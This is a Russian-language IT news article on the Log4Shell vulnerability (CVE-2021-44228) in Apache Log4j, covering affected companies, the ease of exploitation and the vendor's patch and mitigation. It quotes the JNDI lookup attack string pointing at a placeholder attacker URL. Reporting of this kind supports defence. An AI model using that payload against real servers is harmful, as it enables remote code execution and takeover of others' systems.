Support us

Новая 0day-уязвимость затрагивает миллионы приложений, крупнейшие компании

Критическую уязвимость нулевого дня, получившую название Log4Shell, недавно обнаружили ИБ-специалисты Alibaba Cloud. При успешной эксплуатации злоумышленники могут запускать на целевом устройстве произвольный код, например внедрять вирусы-вымогатели и криптомайнеры, и получать контроль над атакуемыми серверами. Первые реальные атаки с её использованием Cisco и Cloudflare зафиксировали две недели назад 1 и 2 декабря.

Оставить комментарий
Новая 0day-уязвимость затрагивает миллионы приложений, крупнейшие компании

Критическую уязвимость нулевого дня, получившую название Log4Shell, недавно обнаружили ИБ-специалисты Alibaba Cloud. При успешной эксплуатации злоумышленники могут запускать на целевом устройстве произвольный код, например внедрять вирусы-вымогатели и криптомайнеры, и получать контроль над атакуемыми серверами. Первые реальные атаки с её использованием Cisco и Cloudflare зафиксировали две недели назад 1 и 2 декабря.

Уязвимости присвоен код CVE-2021-44228 и максимальный уровень опасности по шкале CVSS. Она кроется в библиотеке Apache Log4j, которую используют для ведения логов миллионы Java-приложений.

Для атаки достаточно заставить приложение внести в журнал лишь одну строку кода в формате ${jndi:ldap://[attacker_URL]}, что позволит в дальнейшем интегрировать в него собственный код. В открытый доступ уже выложены рабочие эксплойты, а злоумышленники активно сканируют сеть в поисках уязвимых подключённых устройств. Эксперты по кибербезопасности ожидают, что в ближайшие дни атаки на подверженные системы участятся.

Уязвимость затрагивает Amazon, Apple, Steam, Minecraft, Tesla, Red Hat и множество других компаний, в софте которых используется библиотека. К примеру, в случае Minecraft взломать серверы и компьютеры геймеров можно, отправив сообщение с кодом в окно чата.

Особую серьёзность уязвимости придаёт то, насколько она проста в эксплуатации (атаку может осуществить даже неопытный хакер), насколько обширный контроль может обеспечить злоумышленнику и насколько вездесуща сама библиотека, поэтому потенциальный ущерб огромен.

Apache Foundation в прошлую пятницу выпустила патч и советует разработчикам обновить библиотеку до версии 2.15.0. Если сделать это нет возможности, рекомендуется перевести параметр log4j2.formatMsgNoLookups в значение true.

Место солидарности беларусского ИТ-комьюнити

Далучайся!

Читайте также
10 классных ИТ-курсов из сферы, которой не грозят увольнения (июнь 2023)
10 классных ИТ-курсов из сферы, которой не грозят увольнения (июнь 2023)
10 классных ИТ-курсов из сферы, которой не грозят увольнения (июнь 2023)
Собрали для вас интересные курсы по информационной безопасности на различных популярных платформах. В подборке как программы для новичков, так профессиональные сертификации для опытных айтишников, которым требуется прокачать Cyber Security более глубоко или освежить знания. 
В России двадцатикратный дефицит специалистов по кибербезопасности
В России двадцатикратный дефицит специалистов по кибербезопасности
В России двадцатикратный дефицит специалистов по кибербезопасности
3 комментария
Хакеры начинают искать и атаковать уязвимости уже через 15 минут после публикации данных о них
Хакеры начинают искать и атаковать уязвимости уже через 15 минут после публикации данных о них
Хакеры начинают искать и атаковать уязвимости уже через 15 минут после публикации данных о них
Microsoft обвинили в кибератаках «под чужим флагом» и создании ИТ-армии Украины
Microsoft обвинили в кибератаках «под чужим флагом» и создании ИТ-армии Украины
Microsoft обвинили в кибератаках «под чужим флагом» и создании ИТ-армии Украины

Хотите сообщить важную новость? Пишите в Telegram-бот

Главные события и полезные ссылки в нашем Telegram-канале

Обсуждение
Комментируйте без ограничений

Релоцировались? Теперь вы можете комментировать без верификации аккаунта.

Комментариев пока нет.